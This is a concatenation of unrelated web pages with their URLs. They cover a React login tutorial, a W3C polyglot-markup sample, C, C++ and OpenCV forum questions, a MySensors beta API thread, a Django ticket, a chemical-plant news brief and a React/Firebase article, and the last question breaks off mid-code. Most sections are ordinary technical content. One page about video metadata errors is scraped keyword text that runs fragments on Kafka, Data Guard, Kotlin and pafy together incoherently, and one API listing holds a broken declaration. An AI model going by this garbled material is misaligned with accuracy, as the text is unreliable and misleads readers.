      </div>
    );
  }
}

We are introducing a couple of new concepts in this.

In the constructor of our component we create a state object. This will be where we'll store what the user enters in the form.

We then connect the state to our two fields in the form by setting this.state.email and this.state.password as the value in our input fields. This means that when the state changes, React will re-render these components with the updated value.

But to update the state when the user types something into these fields, we'll call a handler function named handleChange.
This function grabs the id (set as controlId for the <FormGroup>) of the field being changed and updates its state with the value the user is typing in. Also, to have access to the this keyword inside handleChange, we store a reference to an anonymous function like so: handleChange = (event) => { }.

We are setting the autoFocus flag for our email field, so that when our form loads, it sets focus to this field.

We also link up our submit button with our state by using a validate function called validateForm. This simply checks if our fields are non-empty, but could easily do something more complicated.

Finally, we trigger our callback handleSubmit when the form is submitted. For now we are simply suppressing the browser's default behavior on submit, but we'll do more here later.

Let's add a couple of styles to this in the file src/containers/Login.css.

@media all and (min-width: 480px) {
  .Login {
    padding: 60px 0;
  }

  .Login form {
    margin: 0 auto;
    max-width: 320px;
  }
}

These styles roughly target any non-mobile screen sizes.

Add the Route

Now we link this container up with the rest of our app by adding the following line to src/Routes.js below our home <Route>.

<Route path="/login" exact component={Login} />

And include our component in the header.

import Login from "./containers/Login";

Now if we switch to our browser and navigate to the login page we should see our newly created form.

Next, let's connect our login form to our AWS Cognito setup.
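The update handleChange performs relies on an ES6 computed property name. That one piece can be sketched in isolation (the event object here is a hand-made stand-in for what the form control passes in):

```javascript
// Stand-in for the event object a FormControl passes to handleChange.
const event = { target: { id: "email", value: "user@example.com" } };

// ES6 computed property name: the field's controlId becomes the key,
// so one handler can serve both the email and password fields.
const patch = { [event.target.id]: event.target.value };

console.log(patch);
```

This is why giving each FormGroup a controlId matching its state key lets a single handleChange cover every field in the form.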
https://branchv21--serverless-stack.netlify.app/chapters/create-a-login-page.html
The source code for this document uses polyglot markup. The following shapes use SVG elements. Polyglot markup introduces undeclared (native) default namespaces for the root SVG element (svg) and respects the mixed-case element names and values when appropriate, as described in the section on Element-Level Namespaces, the section on Element Names and the section on Attribute Values. There is an empty p element before this paragraph. Polyglot markup uses <p></p> and not <p/>. Polyglot markup treats certain elements as self-closing, void elements, such as the following img element. For more information, see the Void Elements section. The following table uses the required tbody element, as described in the Required elements and tags section. The following table makes use of the col element and therefore uses the then required colgroup element as a wrapper for the col elements, as described in the Required elements and tags section. The paragraph you now read uses the string &amp; for ampersands ("&") and uses, as described in the section on Named entity references, the string &#xA0; for a non-breaking space between the following two words: "polyglot markup".
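Taken together, the rules this sample page exercises can be collected into a single illustrative fragment (a sketch based on the statements above, not part of the original page; the numeric reference &#xA0; is assumed to be the intended non-breaking-space spelling):

```html
<table>
  <colgroup>
    <!-- col elements must be wrapped in a colgroup -->
    <col/>
    <col/>
  </colgroup>
  <tbody><!-- the tbody tags are required in polyglot markup -->
    <tr><td>a</td><td>b</td></tr>
  </tbody>
</table>
<p></p><!-- an empty p is written as <p></p>, never <p/> -->
<img src="shape.svg" alt="shape"/><!-- void element, self-closing -->
<p>polyglot&#xA0;markup &amp; friends</p>
```

Each construct is valid when parsed either as HTML or as XML, which is the point of the polyglot rules.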
http://www.w3.org/TR/html-polyglot/SamplePage.html
I created a function in my program that takes info about a teacher and their classroom and then writes it to a file. Then I added a loop so that people could keep adding more teachers. Then I thought it would be good to add a break statement so people can easily close the program. The problem is that after you cycle through this once it starts looping and never stops for user input.

Here's the code:

Code:
#include <iostream>
#include <fstream>

using namespace std;

int teacher_info(char name[10], char subject[10], int room_num)
{
    ofstream fout("school.txt");
    fout << name << ":\n\tSubject: " << subject << "\n\tRoom number: " << room_num << endl;
    fout.close();
    return 0;
}

int main()
{
    char name[10], subject[10];
    int room_num;

    cout << "\nNOTE: to exit type 'exit' as the teacher name." << endl;

    while (true)
    {
        cout << "\nName: ";
        cin >> name;
        if (name == "exit")
            break;
        cout << "\nSubject: ";
        cin >> subject;
        cout << "\nRoom number: ";
        cin >> room_num;
        teacher_info(name, subject, room_num);
    }
    return 0;
}
https://cboard.cprogramming.com/cplusplus-programming/31971-infinate-loop.html
1.4 Beta

The 1.4 version of the MySensors Arduino library is now open for beta testing.

Arduino library and examples
Vera plugin (1.4)

Here are some of the highlights.

All examples in the development branch above have been converted to use the new functionality of the library.

The new API:

/**
 * Constructor
 *
 * Creates a new instance of Sensor class.
 *
 * @param _cepin The pin attached to RF24 Chip Enable on the RF module (default 9)
 * @param _cspin The pin attached to RF24 Chip Select (default 10)
 */
MySensor(uint8_t _cepin=9, uint8_t _cspin=10);

/**
 * Begin operation of the MySensors library
 *
 * Call this in setup(), before calling any other sensor net library methods.
 * @param incomingMessageCallback Callback function for incoming messages from other nodes or controller and request responses. Default is NULL.
 * @param nodeId The unique id (1-254) for this sensor. Default is AUTO(255) which means sensor tries to fetch an id from controller.
 * @param repeaterMode Activate repeater mode. This node will forward messages to other nodes in the radio network. Make sure to call process() regularly. Default is false.
 * @param parentNodeId Use this to force node to always communicate with a certain parent node. Default is AUTO which means node automatically tries to find a parent.
 * @param paLevel Radio PA Level for this sensor. Default RF24_PA_MAX
 * @param channel Radio channel. Default is channel 76
 * @param dataRate Radio transmission speed. Default RF24_1MBPS
 */
);

/**
 * Return the nodes nodeId.
 */
uint8_t getNodeId();

/**
 * Each node must present all attached sensors before any values can be handled correctly by the controller.
 * It is usually good to present all attached sensors after power-up in setup().
 *
 * @param sensorId Select a unique sensor id for this sensor. Choose a number between 0-254.
 * @param sensorType The sensor type. See sensor typedef in MyMessage.h.
 * @param ack Set this to true if you want destination node to send ack back to this node.
 * Default is not to request any ack.
 */
void present(uint8_t sensorId, uint8_t sensorType, bool ack=false);

/**
 * Sends sketch meta information to the gateway. Not mandatory but a nice thing to do.
 * @param name String containing a short Sketch name or NULL if not applicable
 * @param version String containing a short Sketch version or NULL if not applicable
 * @param ack Set this to true if you want destination node to send ack back to this node. Default is not to request any ack.
 */
void sendSketchInfo(const char *name, const char *version, bool ack=false);

/**
 * Sends a message to gateway or one of the other nodes in the radio network
 *
 * @param msg Message to send
 * @param ack Set this to true if you want destination node to send ack back to this node. Default is not to request any ack.
 * @return true Returns true if message reached the first stop on its way to destination.
 */
bool send(MyMessage &msg, bool ack=false);

/**
 * Send this nodes battery level to gateway.
 * @param level Level between 0-100(%)
 * @param ack Set this to true if you want destination node to send ack back to this node. Default is not to request any ack.
 */
void sendBatteryLevel(uint8_t level, bool ack=false);

/**
 * Requests a value from gateway or some other sensor in the radio network.
 * Make sure to add callback-method in begin-method to handle request responses.
 *
 * @param childSensorId The unique child id for the different sensors connected to this Arduino. 0-254.
 * @param variableType The variableType to fetch
 * @param destination The nodeId of other node in radio network. Default is gateway
 */
void request(uint8_t childSensorId, uint8_t variableType, uint8_t destination=GATEWAY_ADDRESS);

/**
 * Requests time from controller. Answer will be delivered to callback.
 *
 * @param callback for time request. Incoming argument is seconds since 1970.
 */
void requestTime(void (* timeCallback)(unsigned long));

/**
 * Processes incoming messages to this node.
 * If this is a relaying node it will
 * Returns true if a message addressed to this node was just received.
 * Use callback to handle incoming messages.
 */
boolean process();

/**
 * Returns the most recent node configuration received from controller
 */
ControllerConfig getConfig();

/**
 * Save a state (in local EEPROM). Good for actuators to "remember" state between
 * power cycles.
 *
 * You have 256 bytes to play with. Note that there is a limitation on the number
 * of writes the EEPROM can handle (~100 000 cycles).
 *
 * @param pos The position to store value in (0-255)
 * @param value Value to store in position
 */
void saveState(uint8_t pos, uint8_t value);

/**
 * Load a state (from local EEPROM).
 *
 * @param pos The position to fetch value from (0-255)
 * @return Value stored in position
 */
uint8_t loadState(uint8_t pos);

/**
 * Returns the last received message
 */
MyMessage& getLastMessage(void);

/**
 * Sleep (PowerDownMode) the Arduino and radio. Wake up on timer.
 * @param ms Number of milliseconds to sleep.
 */
void sleep(int ms);

/**
 * Sleep (PowerDownMode) the Arduino and radio. Wake up on timer or pin change.
 * See: for details on modes and which pin
 * is assigned to what interrupt. On Nano/Pro Mini: 0=Pin2, 1=Pin3
 * @param interrupt Interrupt that should trigger the wakeup
 * @param mode RISING, FALLING, CHANGE
 * @param ms Number of milliseconds to sleep or 0 to sleep forever
 * @return true if wake up was triggered by pin change and false means timer woke it up.
 */
bool sleep(int interrupt, int mode, int ms=0);

/**
 * getInternalTemp
 *
 * Read temp from internal (ATMEGA328 only) temperature sensor. This reading is very
 * inaccurate so we round the result to full degrees celsius.
 *
 * @return Temperature in full degrees Celsius.
 */
int getInternalTemp(void);

### To convert an old 1.3 sketch follow this guide:

#### Include section

Remove the following includes:

#include <Sleep_n0m1.h>
#include <EEPROM.h>
#include <RF24.h>
#include <Sensor.h>
#include <Relay.h>

Add:

#include <MySensor.h>

#### Global variable scope

Change the following lines:

Sensor gw;

or

Relay gw;

To:

MySensor gw;

Also add message containers for outgoing messages, e.g. a light level message for child sensor id 1:

MyMessage msg(1, V_LIGHT_LEVEL);

#### Setup()

In setup(), replace sendPresentation with present. Also note that begin() now allows you to add a function argument to get callbacks for incoming messages (actuators). begin() also controls whether this node should act as a repeater node. See above for the full argument list.

#### Loop()

The sending of values looks a bit different. The old sketches could look like this:

gw.sendVariable(CHILD_ID_LIGHT, V_LIGHT_LEVEL, lux);

In new code you send a value by using the MyMessage container defined in global scope. Fill it with the value to send like this (where lux is the light level in this case):

gw.send(msg.set(lux));

Replace any sleeping with the new built-in sleep functions. The old code might have a few lines like this:

delay(500);
gw.powerDown();
sleep.pwrDownMode(); //set sleep mode
sleep.sleepDelay(SLEEP_TIME * 1000);

Replace those with:

gw.sleep(<sleep time in milliseconds>);

@Hek Ok, so last time I was writing about my problem with the latest version of this beta, and Relays not working. When I am sending a message, for example 11;1;1;2;1, with or without a newline char, nothing happens. Even stranger is that the serial gateway is giving me a message with 4 segments, instead of the normal 5. Look at the screenshot: . This is Relay + button, but the same thing happens with Relay alone.

While the server was down, I've used a recent tab from this post. This file represents the mhl backup. Due to server upload limits, I removed one photo and zipped the mhl file. It is like it never happened.
Arduino Library 1_4b1_ Call for beta testers_ MySensors Forum.zip

This post is deleted!

Hello, I'm using the serial gateway and trying to interface with a Linux machine. I set up the serial port with a simple:

stty -F /dev/ttyUSB0 cs8 115200 -onlcr -icrnl

cat /dev/ttyUSB0 works fine:

0;0;3;9;Arduino startup complete.
0;0;3;9;read: 255-255-0 s=255,c=3,t=3,pt=0,l=0,cr=ok:
255;255;3;3;

but I am unable to send data from the gateway:

echo -n -e "255;255;3;4;1\n" > /dev/ttyUSB0

Nothing happens; not even in Perl can I get it to work:

$port->write("255;255;3;4;1\n");

What am I doing wrong?

Thanks, that worked. I thought I understood the message layout.. never seen that 0 before :)

It's a change in the serial protocol for 1.4. 1 = request ack back from destination node. 0 = no ack.

It's a change in the serial protocol for 1.4.

Could you describe it better, keeping in mind my problem with Relay? How should the message look to turn on the Relay? Previously a message like this worked ok - 11;1;1;2;1.
It would be great if GW resends the messsage automatically a couple of times (configurable) if ACK = 1. I've also noticed during DEBUG enabled that the message gets overwritten by old one, i.e. send: 3-3-0-0 s=255,c=0,t=18,pt=0,l=15,st=fail:1.4b1 (18848a2) send: 3-3-0-0 s=255,c=3,t=11,pt=0,l=4,st=ok:test1 (18848a2) send: 3-3-0-0 s=255,c=3,t=12,pt=0,l=3,st=ok:2.0t1 (18848a2) (message 2: test1, message 3: 2.0) Edit; One more thing Do I really need one gw.process(); before each gw.send(..); in the loop? I seam to loose messages if I dont do like that. void loop() { delay(dht.getMinimumSamplingPeriod()); gw.process(); float temperature = dht.getTemperature(); gw.send(msgTemp.set(temperature, 1)); gw.process(); float humidity = dht.getHumidity(); gw.send(msgHum.set(humidity, 1)); // gw.sleep(SLEEP_TIME); //Seems to break recieing message, loosing ~75% } @Damme Other wireless protocols usually have a counter which is increased with each message. Returning the counter as an ack would be sufficient to correlate the ack and the original message. Returning the whole message seems like overkill indeed... The send-methods could e.g. return the Id counter of the message sent, and an app waiting for an ack on that message should check for this value in any ack received (using some timeout) Additional comment on config; I think it should be request config, response config messages. I also think its a bit odd that the actuator reports as gw.present(2, S_LIGHT); but requests as if (message.type==V_LIGHT) { V_LIGHT != S_LIGHT (2 vs 3) I think the def should follow as much as possible. hope any of my thoughts are somewhat useful @Damme there's a lot of Vera legacy in there... This forum had a discussion going on about decoupling from Vera, but I'm afraid that got lost in the crash... // gw.sleep(SLEEP_TIME); //Seems to break recieing message, loosing ~75% me just dumb here, delay(SLEEP_TIME); works. gw.sleep puts radio in sleep I guess. me just dumb here, delay(SLEEP_TIME); works. 
gw.sleep puts radio in sleep I guess. gw.sleep() puts both Arduino and radio to sleep. The send-methods could e.g. return the Id counter of the message sent, and an app waiting for an ack on that message should check for this value in any ack received (using some timeout) That mean you might have to rememeber the original message. The idea is to have all the information necessary in the callback. In my example sketches (e.g. RelayActuator) the ack message actually changes the relay status when the ack comes back from gateway. If not full message came in you would have to keep buffers with sent messages and start matching counter-values. Much more complicated. But a message counter will probably be necessary if/when we start encrypting messages to prohibit replay attacks. @Damme I actually thought about having a bit in the message header which says if the message is an ack or not. With that implemented you would just call a msg.isAck() to determine if the incoming message is an ack message. Would that be ok? You shouldn't need to call gw.process() after each send. It is only necessary in the loop() section if you expect incoming messages or have enabled repeater mode. I don't understand what you mean with messages getting overwritten with DEBUG enabled. Could you explain it a bit more (with an example?)..
https://forum.mysensors.org/topic/168/1-4-beta/23
All of the components on the board are 'hitable'. If you have got an Astro Pi board and haven't yet set it up, take a look at my Astro Pi - Getting Started Tutorial.

Once your Astro Pi is up and running you can download the code from github.com/martinohanlon/MinecraftInteractiveAstroPi and run it by opening a terminal and using the following commands:

cd ~
git clone
cd MinecraftInteractiveAstroPi
sudo python mcinteractiveastropi.py

The Minecraft Astro Pi board will appear above the player, so fly up (double tap space) and have a look around. You interact with it by hitting it (right clicking) with a sword.

Someone let me know that they got an error while trying to use the program with Python 2 because Astro Pi needs a module called PIL which wasn't installed. I didn't get this error, but if you received the error "No module named PIL", run the following command to install it:

sudo pip install Pillow

Hi, I'm having no luck with this. I get this error message:

Traceback (most recent call last):
  File "mcinteractiveastropi.py", line 16, in <module>
    from astro_pi import AstroPi
ImportError: No module named astro_pi

The Astro Pi is connected because I checked with another program. Hope you can help.

It's a simple problem. When I wrote this, I was using a Beta version of the Sense HAT software and at the time it was called "astro_pi". Change:

from astro_pi import AstroPi

to:

from sense_hat import AstroPi

I'll also update the repository, so you could delete it and re-download it.

Thank you Martin, it's all working well now. Looking forward to showing this to my Minecraft-mad grandson.

No problem, thanks for letting me know.
http://www.stuffaboutcode.com/2015/05/interactive-minecraft-astro-pi.html
20 April 2009 17:46 [Source: ICIS news]

LONDON (ICIS News)--INEOS ChlorVinyls has shut the methylene chloride, chloroform and methyl chloride units at its Runcorn plant.

The shutdown, which took place over 18-19 April, is expected to halt production of the chemicals for at least a week, the source said.

The shutdown came as some methylene chloride producers were trying to increase prices in an effort to recover revenue lost to falling caustic soda prices. Another methylene chloride producer said the INEOS closure would help it push through a price increase in May.

The shutdown is unlikely to have a large effect on the chloroform market, as INEOS uses most of its chloroform captively for the production of the refrigerant R22. The chloroform market has been hit by weak demand for refrigerants from the automotive and construction sectors.

For more on methylene chloride and chloroform.
http://www.icis.com/Articles/2009/04/20/9209459/ineos-chlorvinyls-halts-production-at-runcorn-plant.html
We are currently writing a program that captures still images at the FPS specified for the web camera. The approach is to acquire the elapsed time manually and take an image every time a fixed interval has passed. Capturing the camera image seems to take longer than necessary, so because of the delay we cannot shoot at the FPS we wanted. The goal of this program is to shoot at 20 FPS with as little error as possible. I thought the shutter time might be too long, but how can I set the shutter time in OpenCV?

Supplemental information (FW/tool version etc.)

#include "main.h"

int main(void)
{
    int fps = 10; // FPS specified
    double spf = 1.0 / fps;
    const int maxCount = 100;
    int i;
    int key;
    LARGE_INTEGER freq;
    LARGE_INTEGER start, now;
    double time;
    double count;
    char name[256];
    cv::Mat frame;
    cv::VideoCapture cap(0);

    if (!cap.isOpened()) {
        return -1;
    }
    cap.set(CV_CAP_PROP_FPS, 20); // What is this setting?
    cap.set(CV_CAP_PROP_FRAME_WIDTH, 640);
    cap.set(CV_CAP_PROP_FRAME_HEIGHT, 480);

    if (!QueryPerformanceFrequency(&freq)) { // Get the unit of elapsed time
        return -1; // get failed
    }
    if (!QueryPerformanceCounter(&start)) { // Get the first elapsed time
        return -1;
    }
    count = 1.00;
    while (1) {
        if (!QueryPerformanceCounter(&now)) { // Get current elapsed time
            return -1;
        }
        time = (double)(now.QuadPart - start.QuadPart) / freq.QuadPart; // Elapsed time calculation
        if (time >= count) { // Shoot if more than count has elapsed.
            // printf("count = %f : %.3f : ", count, time);
            cap >> frame;
            if (!
QueryPerformanceCounter(&now)) {
                return -1;
            }
            time = (double)(now.QuadPart - start.QuadPart) / freq.QuadPart; // Calculate elapsed time after shooting
            // printf("%.3f\n", time);
            sprintf_s(name, "%.3f.jpg", time);
            cv::imwrite(name, frame);
            cv::imshow("Capture", frame);
            count += spf;
        }
        key = cv::waitKey(1);
        if (key == 0x1b)
            break;
    }
    getchar();
    return 0;
}

Windows 10
Visual Studio 2017
OpenCV 3.4.1

Answer #1

Answer #2

I think so too. time - count should give you the error in the time at which you want to release the shutter, so if you print it out and comment out cv::imwrite, you can see it. If so, why not keep the images in memory instead of writing them to a file?

Answer #3

cap.set(CV_CAP_PROP_FPS, 20); // What is this setting?

I think the camera is being set to 20 fps here. (It may not be possible to set this, depending on the camera.) If it is set to 20 fps, then 20 fps is the maximum, so if you add processing in between, each frame may take the 20 fps interval plus some extra time. I think it is better to test here by commenting out or deleting the whole timer. As a hardware issue, some web cameras lower their FPS on their own to increase the amount of light in a dark place, so if you are shooting in a dark place, you can also test in a bright place.

Answer #4

As a practical example of using 40 FPS with a webcam in practice: OpenCV's video capture layer is intended for general-purpose use, so the actual FPS is always slower than the theoretical value. In practice, you should be able to build on a DirectX-based library, capture at 32 bits, convert to 24 bits, and set the webcam to a compressed format. I have answered with an actual example in the past, but I will try to sample with EWCLIB (it comes up as soon as you google it — a very helpful implementation example that is defined entirely in headers). In addition, you can set each resolution, compression format and FPS, and display the result of actual execution in the example.
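The scheduling logic in the question — shoot whenever the elapsed time crosses the next count, then advance count by spf — can be prototyped without a camera or OpenCV. A Python sketch that simulates the loop and records when each simulated capture fires (the capture itself is stubbed out):

```python
import time

def capture_at_fps(fps, n_frames, grab=lambda: None):
    """Fire grab() on a fixed time grid, like the QueryPerformanceCounter loop."""
    spf = 1.0 / fps
    start = time.monotonic()
    next_shot = spf          # plays the role of "count" in the original code
    stamps = []
    while len(stamps) < n_frames:
        elapsed = time.monotonic() - start
        if elapsed >= next_shot:
            grab()           # stand-in for cap >> frame
            stamps.append(elapsed)
            next_shot += spf # advance on the grid, not from "now", so one
                             # slow grab does not shift every later shot
    return stamps

stamps = capture_at_fps(fps=100, n_frames=5)
print([round(s, 3) for s in stamps])
```

Printing elapsed - next_shot at each shot shows exactly how much each frame is late, which is a useful first measurement before blaming the shutter time.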
Does cv::imwrite() take too long?
https://www.tutorialfor.com/questions-101015.htm
Opened 11 years ago
Closed 11 years ago
Last modified 11 years ago

#1179 closed defect (fixed)

[magic-removal] Models not in INSTALLED_APPS should raise ImportError

Description

In trunk, if you try to import a model that isn't in INSTALLED_APPS, Django will raise ImportError. This lets you do the following:

    try:
        from django.models.foo import bar
    except ImportError:
        bar = None
    # ...
    if bar is not None:
        bar_objects = bar.get_list()
    else:
        bar_objects = []

The magic-removal branch doesn't yet have this feature.

Change History (6)

comment:1 Changed 11 years ago by

comment:2 Changed 11 years ago by

Adrian, the patch you've added forces all models to be in models.py, as noted in #1437. Could you revert the patch? The functionality in trunk is a remnant of the old magic way of doing things. You can do it this way now (with or without the patch):

    from myproj.myapp.models import bar
    from django.db.models.loading import get_models
    if not bar in get_models():
        bar = None

comment:3 Changed 11 years ago by

Just to clarify my argument a bit: the behaviour you've re-added is definitely magic of the bad variety -- you don't expect in normal Python that doing an import should fail when it is perfectly possible to import the name. In other words, 'models not in INSTALLED_APPS should not raise ImportError' is magic-removal's response to this behaviour, I would have thought.

comment:4 Changed 11 years ago by

I second that. I've just started porting my apps over to magic-removal today and hit this right away. It was working perfectly well in trunk. I am using this method for model inheritance so that the parent model classes don't have tables created for them in the DB.

In myproj/myapp/basemodel.py I have:

    class BaseModel(models.Model):
        # fields

and in myproj/myapp/models.py I have:

    from myproj.myapp.basemodel import BaseModel

    class MyModel(BaseModel):
        # more fields

Then I get this:

    >>> from myproj.myapp.models import MyModel
    Traceback (most recent call last):
      File "<stdin>", line 1, in ?
      File "/path/to/myproj/myapp/models.py", line 2, in ?
        from myproj.myapp.basemodel import BaseModel
      File "/path/to/myproj/myapp/basemodel.py", line 5, in ?
        class BaseModel(models.Model):
      File "/path/to/django/django/db/models/base.py", line 33, in __new__
        raise ImportError, "INSTALLED_APPS must contain %r in order for you to use this model." % re.sub('\.models$', '', mod)
    ImportError: INSTALLED_APPS must contain 'myproj.myapp.basemodel' in order for you to use this model.

comment:5 Changed 11 years ago by

Another possibility is to add an 'installed' attribute onto a model's '_meta', at the same point in the code where you are currently throwing an ImportError. So the code to check a model would look like this:

    from myproj.myapp.models import Bar
    if not Bar._meta.installed:
        Bar = None

(In [2406]) magic-removal: Fixed #1179 -- Models not in INSTALLED_APPS now raise ImportError
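The pattern in the ticket description is the standard optional-import guard. Here is a self-contained illustration using a stdlib module in place of a Django model, so the snippet runs anywhere (`optional_backend` is a hypothetical name, not part of Django):

```python
# Try the import, fall back to None, and branch on availability later,
# exactly as the ticket's trunk example does with a Django model.
try:
    import json as optional_backend
except ImportError:
    optional_backend = None

if optional_backend is not None:
    payload = optional_backend.dumps({"available": True})
else:
    payload = "{}"

print(payload)  # → {"available": true}
```

Comment 5's `_meta.installed` proposal replaces the try/except with an explicit attribute check, which avoids making a successful import raise.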
https://code.djangoproject.com/ticket/1179
Video player documentation — Embedding the player. Dailymotion provides a simple way to display videos on your website or application: it is possible to embed.

Fetching package metadata error — Showing 1-5 of 5 messages. Fetching package metadata error, pybokeh, 3/27/14 12:16 PM: Hi, at work we just migrated to Windows 7.

Error Pam Authentication Failure For Ssh — Backbone.js gives structure to web applications by providing models with key-value binding and custom events, and collections with a rich API of enumerable ...

Apache Kafka: Fetching topic metadata with correlation id 0 — but basically "Fetching topic metadata" is the first thing the ... Error while fetching metadata with ...

Implementing Data Guard (Standby) — General concepts: components, roles, interfaces, architecture, Data Guard protection modes, physical standby implementation with ...

Google Cloud Video Intelligence API — Use the client and call Poll. If the metadata is not available, the returned metadata and error are both nil. Poll also fetches the latest metadata, which can be retrieved by Metadata. If Poll fails, the error ...

If you're not getting any metadata then watch this: Icefilms Metadata Container Permanent Fix. 1Channel Ice Films script error meta handler fix.

Hi, I'm in search of a program that can automatically find and fetch information about a file from sites like TheTVDB.com and add it as metadata.

You can manually fix this by uploading a new thumbnail in the Backlot UI, or upload the video, thumbnail, and metadata file for that video again ("error fetching feed").

We have a static gifs() method that uses fetch to talk to Imgur and return a ...

    import java.security.Principal

    @RestController
    class HomeController(val repository: NotesRepository) {
        @GetMapping("/")
        fun home(principal: Principal): List {
            println("Fetching notes for ...

... you'll get an error that the Principal parameter is not ...

Error fetching API code definition, code 400. Failed to get ... — after developing an API App I'm always getting the following error when I try ... "Failed to get metadata for ...". I get an 'Error fetching API code definition ...'

Development / Source code / Bug reporting: github.com/np1/pafy. They hold metadata such as title, viewcount, author and video ID: the character video id of the video; basic (bool) – fetch basic metadata and streams; gdata (bool) – fetch gdata. Scripts for fetching metadata for video files automatically.

New cloud services can transform cloud-based video sharing and collaboration.

Function and Method listing — list of all the functions and methods in the manual (abs – absolute value; acos ...).

As video is transmitted, a variety of metadata inputs will allow multiple devices and use cases to be handled. They deliver the lowest possible latency while overcoming bandwidth and link quality constraints with the use of additional ...

This plugin allows you to export images from Lightroom directly to your Flickr account. This plugin works in Lightroom 6/CC (and older versions as far back as ...).
http://thesecondblog.com/error-fetching-video-metadata/
React and Firebase without Redux

Even after spending a number of years contributing to tools that help integrate Firebase with Redux, such as react-redux-firebase and redux-firestore, I have recently been avoiding using Redux to store database data in new React + Firebase projects. In this article I'll cover a bit about why, show what I have been doing instead, and finally how to easily start a new React + Firebase project using these tools.

Why?

Firebase SDK Manages State

Firebase's client SDK manages caching and offline support internally. Having another copy of database state in Redux is not only prone to inconsistencies, but also requires more code to manage that state.

Data Loading Is Async By Nature

Loading data from a database or service takes time. Writing logic to handle these loading conditions for data coming from Redux state often leads to if statements in component code which can quickly get unwieldy. Also, the logic used to pull this data out of Redux state is often repeated in many places.

It would be great to have loading state available right in the component where we are attaching the listener. To simplify things even more, it would be great if we could leverage React's Suspense to give us the syntactic sugar to declaratively specify our loading logic, which makes it easier to reason about and debug. We can cover a bit more about why this can be a great pattern later; let's get into how we can do this!

How?

We will use reactfire, which includes hooks, context providers, and components to simplify interaction with Firebase. Setup includes using the FirebaseAppProvider, which is:

    A React Context Provider that allows the useFirebaseApp hook to pick up the firebase object.

This means that once we set up this context provider we will be able to access the initialized Firebase app instance throughout our application.
Hooks are provided for accessing auth, subscribing to data, loading data once, and even for lazy loading parts of the Firebase SDK (this requires Suspense mode to be enabled, and will be covered in the second example).

Here is an example of stitching these pieces together to load a list of projects from Firestore:

- In the Projects component the useFirestore hook is used to access the Firestore section of the Firebase SDK. We have to make sure to import the Firestore section of the SDK by calling import "firebase/firestore" (in the next example this is handled automatically through Suspense)
- Next we create a reference to the projects Firestore collection by calling firestore.collection("projects") — this will be used later to attach a listener
- The useFirestoreCollectionData hook accepts a ref as an argument and attaches a listener which streams changes directly to your component — this is where data, loading state, and error state come from
- The rest of the component is a series of if conditions which render different content based on that state

Suspense

As noted before, it would be great if we could leverage Suspense to make loading logic clearer to reason about. Managing async logic this way also makes it easy to group other async tasks with data loading, such as lazy loading other components and/or sections of the Firebase SDK. This will help cut down on the initial load time of your applications by making your bundles smaller.

- In this example we pass the suspense prop to the provider to enable suspense mode in reactfire
- Next we see ErrorBoundary — this is a React Error Boundary for catching errors which are thrown in child components (this will handle errors in our listener). The react-error-boundary library is used to avoid creating a custom class component
- Within the boundary we see SuspenseWithPerf — this is a version of React's Suspense which also has built-in logging to Firebase Performance
Here we are using SuspenseWithPerf to show a loading message while Projects suspends (since it is the only child component).

- In the Projects component the useFirestore hook is used to lazy load the Firestore section of the Firebase SDK. This will cause the component to suspend only if the Firestore section has not already been loaded.
- Next we create a reference to the projects Firestore collection by calling firestore.collection("projects") — this will be used later to attach a listener
- The useFirestoreCollectionData hook suspends while a listener is attached which streams changes directly to your component — the changes will cause your component to re-render. Since the loading state is handled with Suspense, only data needs to be used (unlike the first example).

Are You Sure?

What if I wanted data in multiple places?

Let Firebase's SDK handle it for you! Firebase's SDK is smart enough to know if you have multiple listeners with the same query. This means that we can load data within multiple components at different levels of the component tree.

This is a little easier to prove with the Real Time Database, since you can run the database profiler that comes with firebase-tools:

    firebase database:profile

Now, regardless of how many components have a listener attached to a path, there will only be one listener request logged with the database. This is the client being smart enough to update all listener callbacks for any queries which are the same!

NOTE: The above examples use Firestore and would need to be updated to use the Real Time Database in order to show up in the profiler, since the profiler only works for the Real Time Database.

How do I start a new project using these patterns?

generator-react-firebase is a Yeoman generator that I created which outputs a material-ui + Firebase project with a simple projects list view and a project detail page.
It has been updated to use reactfire in the project by default — there is still the option to opt into using Redux, but it is no longer the default.

To use the generator, you install it, then run it. You will be prompted to select the features you'd like, then to provide the information needed to set up your project:

    npm install -g yo generator-react-firebase
    yo react-firebase

Things will wrap up by automatically installing the app's dependencies with either yarn or npm — once that is done you can run yarn start.

Other Questions That May Come To Mind

Do I need to be using Concurrent Mode to use reactfire?

No. You can opt out of enabling suspense mode altogether. Even if you enable suspense mode in reactfire, you do not need to use React's Concurrent Mode. Even though suspense mode is "meant for React Concurrent Mode", that doesn't mean you are required to use a version of React that has Concurrent Mode for things to work. I personally have used reactfire mostly with React 16.18 and 17 without React's Concurrent Mode enabled (even with it enabled in reactfire) and have not noticed any issues yet.

Should I switch my old projects to use these new patterns?

The answer is most likely no, but that will depend on the project. The decision will have to consider how large the project is, the potential impact on application users as well as developers, and the value added by making the shift. I personally switched fireadmin.io (source here) over to these patterns, but that is because of a number of upsides, including:

- A real-world side-by-side comparison of using Redux and using contexts with a tool like reactfire
- Helping the understandability and maintainability of the project for open source contributors

What if I still want to use Redux?

More power to you! It can be a great tool for plenty of use cases; just remember to choose tools based on the needs of the project.
react-redux-firebase and redux-firestore will still be maintained, since there are plenty of projects which require Redux and/or can benefit from loading database data into a store. Though it is no longer the default, generator-react-firebase still has an option to include Redux. When choosing this option, react-redux-firebase is included, and if you choose to include Firestore, redux-firestore will also be included.

What if I don't want Firebase-specific logic all throughout my application?

Using custom hooks can help separate all of this logic out into a business/application-specific domain. For example, if your application has projects, you could make a useProjects custom hook that wraps the reactfire calls.
https://prescottprue.medium.com/react-and-firebase-without-redux-5c1b2b6a6ba1?source=post_internal_links---------4----------------------------
Hello, I asked a question about this program a few days ago, but now I have a new problem. What I want to do now is search through the line that's read in from stdin, and then replace one word with another (both provided as command line arguments). I'm trying to use the strstr() function to check if the word is there, but I can't think of how to replace the word with the other one. Here is what I have:

Code:

    #include <stdio.h>
    #include <string.h>

    int main(int argc, char *argv[])
    {
        char buf[BUFSIZ];

        /* read lines from stdin */
        while ( fgets(buf, BUFSIZ, stdin) ) {
            if (strstr(buf, argv[1]) == NULL)
                puts(buf);
            else
                puts(argv[2]);
        }
        return 0;
    }

All that does is print out argv[2] when strstr() is not NULL. Any help would be greatly appreciated.
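The missing piece is what to do when strstr() finds the word: emit the text before the match, then the replacement, then continue scanning after the match. Here is that algorithm sketched in Python for clarity (an illustration of the logic to port back to C, not a drop-in answer; `replace_word` is a hypothetical helper name):

```python
def replace_word(line, old, new):
    """Mimic a strstr()-style scan: for each occurrence of `old`,
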